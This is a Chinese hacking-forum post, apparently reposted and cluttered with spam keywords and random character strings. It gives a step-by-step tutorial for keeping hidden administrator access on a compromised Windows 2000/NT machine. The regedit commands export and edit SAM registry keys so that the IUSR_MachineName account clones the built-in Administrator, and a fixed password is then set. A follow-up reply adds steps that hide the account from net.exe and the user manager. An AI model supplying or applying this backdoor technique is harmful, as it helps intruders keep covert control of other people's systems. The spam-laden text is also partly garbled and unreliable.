经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的用户，似乎当管理员不存在一般，今天偶违背一下偶以前的初衷，Share一个类似于RootKit的玩艺，当然，这些过程也是可以用脚本实现的，但是我就不写了，OK，Show Time Now。 0 K2 `) R6 p+ @! c. @4 |* S8 N
# m0 Y! m8 f' H
首先要让大家知道的概念是在Windows 2000和Windows NT里，默认管理员帐号的SID是固定的500（0x1f4），那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆，在这里我们选择的帐号是IUSR_MachineName（当然，为了加强隐蔽性，我们选择了这个帐号，所有用户都可以用以下的方法，只不过这个用户较常见罢了），测试环境为Windows 2000 Server。
& O$ i- b4 |* {惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州
* u! S5 o0 V9 Y6 Rwww.hzyes.com运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe)，然后在该CMD Shell里面运行
# r0 h7 m4 Q, D0 _* Z7 q惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州以下是引用片段：惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州3 P$ j! Y0 t4 k3 F2 R: k
regedit /e adam.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4   % |' i# _) S! u% W  u5 P: ]4 R! p2 A

6 q$ S6 y% Y. Y4 f$ Owww.hzyes.com这样我们将SID 为500的管理员帐号的相关信息导出，然后编辑adam.reg文件，将adam.reg文件的第三行--[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4]最后的’1F4’修改为IUSR_MachineName的SID（大部分的机器该用户的SID都为0x3E9，如果机器在最初安装的时候没有安装IIS，而自己创建了帐号后再安装IIS就有可能不是这个值），将Root.reg文件中的’1F4’修改为’3E9’后执行
, Y0 L6 o+ W* C9 X' M惠州乐乐论坛regedit /s adam.reg
+ D5 q5 ~; ~  k' ^7 V5 i. r7 c导入该Reg文件
. X0 e# ?/ T, H0 A2 a8 p9 l惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州
3 ~' V) y0 K' @0 x6 ?: N8 y& n7 F$ l然后运行 " A4 v0 q/ `( y
net user IUSR_MachineName Sometips
  I: q0 m' }0 ?( b惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州修改IUSR_MachineName的密码（最好使用14位的密码，越像IUSR_MachineName的密码越好）
& U0 w$ z2 [7 }9 P( L
2 O( q8 F0 o# \2 QOK,大功告成...
2 r  R4 j4 z  Z: ], U惠州乐乐论坛
+ B' ?* p4 ]( p. u& R- g7 Q惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州这样，我们拥有和默认管理员一样的桌面、一样的Profile..... 惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州" q/ `0 q- _, D# R
而且，当我们运行 net localgroup administrators 时，看看结果：
$ g7 i" Z# \8 X% j( E( @惠州乐乐论坛以下是引用片段：
1 D  u/ R& Q7 O1 S+ K$ z惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州C:/>net localgroup administrators   
2 t& F) n9 `8 }& ~: zwww.hzyes.comAlias name administrators   
! J7 G5 ?: U! ?% ^; @  z, G( H5 w% G惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州Comment Administrators have complete and unrestricted access to the computer/domain   惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州1 c( }  h5 l8 T) ?5 F0 W
www.hzyes.com+ B0 c3 }3 z$ p8 q+ Z3 i
Members   惠州乐乐论坛9 }' `# C4 {  ^% p7 U- O

7 e9 E9 _3 |7 k" Ywww.hzyes.com-------------------------------------------------------------------------------   惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州: r- g/ ?, L0 Q, S/ Y
Administrator   www.hzyes.com, p1 H3 g  _6 `7 R) l4 r
The command completed successfully.   
: O! }8 D- R7 {! w, n+ W4 P/ n7 X惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州0 X' S! z- }0 t% U3 W* O! D
再看看USER2SID的输出结果：
7 p1 b; O/ a5 R惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州C:/>user2sid Administrator
& f2 C6 @! a7 [. z# h' K3 l/ C# |  H9 U惠州乐乐论坛# q  I9 I0 w5 w+ L. a
S-1-5-21-1004336348-1078145449-854245398-500
5 K' I6 H; t! U5 H  ]www.hzyes.com惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州2 q6 n" @4 a4 p# F
Number of subauthorities is 5 : F' M( h' K: D7 S
Domain is IDONTKNOW
/ x+ b1 L( o: t9 h1 _9 b惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州Length of SID in memory is 28 bytes 惠州乐乐论坛- g7 {& T+ t* w7 S
Type of SID is SidTypeUser 惠州乐乐论坛4 W' j) f' z. W- I: n# |2 {
惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州: @. [3 ^% z; @& H) W6 D
C:/>user2sid iusr_machinename
9 H& {0 D) A( u  a5 P/ d, Y# k# B. O
$ T, N/ y& E3 m3 T) Q1 p& \) e( }  _S-1-5-21-1004336348-1078145449-854245398-1001
* g0 L( J- W2 _1 R/ m惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州* M( F2 @0 u2 ^) T1 C
Number of subauthorities is 5 惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州* D' U$ x, f: S4 x/ [2 G- I
Domain is IDONTKNOW
4 S3 R+ Q: w& M( q% Pwww.hzyes.comLength of SID in memory is 28 bytes 惠州乐乐论坛0 l6 o7 S0 K1 ?+ @( v& Y3 S
Type of SID is SidTypeUser 8 P2 M! Q" T' y2 I8 W

; W; ~0 T9 p" p' O我想，再高明的管理员也看不到任何的异状了...而且，随便管理员改成什么密码，我照样可以用IUSR_MachineName，密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName为其他的名字吧) / b9 F8 B, h$ Q# M

; d, d9 Z5 M2 ^, O惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州^_^，这算不算RootKit...
7 U/ }+ Z5 D' j2 C9 _3 c惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州
6 [1 j4 g6 I! I6 u0 `& p4 u附：
0 B  d" G" d$ T1、感谢叮叮付出需要reinstall OS的代价...
1 F( j* m* M4 G: [2 T; nwww.hzyes.com2、任何用以上方法进行试验所导致的系统无法使用均与偶无关，偶均不提供技术支持...
' T0 @( S, }/ z9 t. r1 n0 F: _惠州乐乐论坛: R* f" P1 G6 L, p  C
----------------------------------------------------------------------------- 惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州1 C' k+ |1 q" C2 m- E
3 A' r; h9 B3 Z- {
叮叮 的补充完善 惠州乐乐论坛' \7 e7 ~5 {, A9 r

! W: l2 R1 u' X  zwww.hzyes.com很多人提到使用了管理工具的用户管理后，能够发现IUSR_MachineName被提升了权限。
7 H6 V3 K4 O) }0 W惠州乐乐论坛现给出解决办法。 惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州2 |& p# d8 M. }5 v. ~

3 r1 j) X, e8 O. U6 x4 J惠州乐乐论坛方法同上，不过这次修改内容多一些。即 www.hzyes.com' S" D& f6 H  c$ j& k
这次要导出两个key内容：
" s/ V! W0 W5 e" {( N一个是adam提到的
6 @& c9 K* {  x- P" z以下是引用片段：4 y) g4 V: @+ ~7 u8 z+ D" e" G
regedit /e adam.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4   惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州8 Q# v- [' M1 d* J; `4 o; B* V3 h

9 E  H; v8 [# \/ z+ r/ {3 j) Swww.hzyes.com然后另外一个是你需要修改那个账号的值 惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州- S, s, d1 E. T  e% n
以下是引用片段：' @2 `& h* l' `0 |9 _
regedit /e iusr.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000003E9   惠州乐乐论坛+ j2 x8 M$ f* L) F+ W* [

( H7 `4 O) h$ O! L5 }* e" G' v惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州然后按照adam提到的修改adam.reg 2 u6 F$ B0 N$ T, [) z; K
“将adam.reg文件的第三行 以下是引用片段：惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州4 j/ a& J' _* s. S* m* i3 ]% ~
--[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4]最后的’1F4’ / F$ {# T. _8 E# W( d4 S  s/ c
修改为IUSR_MachineName的SID”
" u, i7 _9 d$ I1 L  `惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州
- y9 N- G' Z6 e' \) F9 Z: q- g现在，你还要从iusr.reg文件中复制一下内容
4 t6 u$ R7 m0 y+ X2 L) P就是将iusr.reg文件中“’V’=hex:0”开始一直到iusr.reg文件结束部分复制下来 & A' S& w* J, X/ o$ g2 J5 `
然后替换掉adam.reg中同样位置的部分
5 J! |0 t7 e& f惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州, ]5 r  y6 T: K) Q$ M6 `
最后使用
: p: ~& i" S. s% V( n& c惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州regedit /s adam.reg www.hzyes.com4 A9 e  S% x! y' [  X
导入该Reg文件
1 I* A2 Y3 X- A" l$ i惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州呵呵，别忘了给这个IUSR_MachineName改密码哦。
9 l7 \7 p  }' h2 `惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州hehe,ok，大功告成。 惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州6 G- |9 E1 X3 @
现在IUSR_MachineName账号拥有了管理员的权限，但是你使用net.exe和 惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州/ k0 s0 A0 J+ v
管理工具中的用户管理都将看不到任何痕迹，即使你去察看所属于的组和用户。 www.hzyes.com6 o) c' y9 Q; ~9 a9 ?" }
都和修改前没有任何区别。

顶你.....!!

什么来的啊~惠州乐乐|惠州YES|惠州论坛|惠州新闻|惠州一线|Hzyes|乐乐论坛|惠州学生|惠州学校|惠州校园|惠州信息|惠州中学|惠州潮流|惠州# Y' Y8 R% d& M' {1 r% a$ N
这么长谁去看~~~

哇..不错不错...